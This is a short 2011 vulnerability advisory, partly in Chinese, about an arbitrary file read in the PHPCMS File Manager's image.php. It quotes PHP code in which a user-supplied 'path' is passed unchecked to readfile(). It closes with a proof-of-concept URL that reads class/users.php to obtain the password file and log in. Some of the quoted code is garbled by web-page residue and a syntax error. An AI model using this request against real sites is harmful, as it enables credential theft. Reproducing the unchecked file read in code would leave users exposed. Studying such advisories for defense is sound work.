#
#Author : HeXie S3curity TeAm
#Date : 2011.10.01
#

#FIle : /image.php
<?php
/*
*#########################################
* PHPCMS File Manager
* Copyright (c) 2004-2006 phpcms.cn
* Author: Longbill ( www.longbill.cn )
* longbill.cn@gmail.com www.2cto.com
*#########################################
*/

$path = $_GET["path"]; //读取路径信息
$from = $_SERVER[HTTP_REFERER];
$from = dirname($from).'/';
if ($from != '/' ) $path = str_replace($from,"",$path);
$max = $_GET["max"];
include_once("func.php");
$etag = "qqqq";
if ($_SERVER['HTTP_IF_NONE_MATCH'] == $etag)
{
header('Etag:'.$etag,true,304);
exit;
}
else header('Etag:'.$etag);
header('Last-Modified:Tue,01 Aug 1999 10:26:24 GMT');

if (!$path || !file_exists($path)) $path="images/notfound.gif"; //图片没有找到
if (!$max) err(); //{通过Get方法传递的Max变量, 当$Max不成立时将调用err 函数.}
我们来看看err 函数是怎么写的.
view sourceprint?FiLe : /image.php

function err()
{
global $path;
header("Content-Length: "));
readfile($path); //读取$path.
die;
}

PoC:
http://www.webshell.cc/cms/image.php?path=class/users.php//读取密码文件, 前台登陆.
如果没有显示,请右键源码形式打开.
end.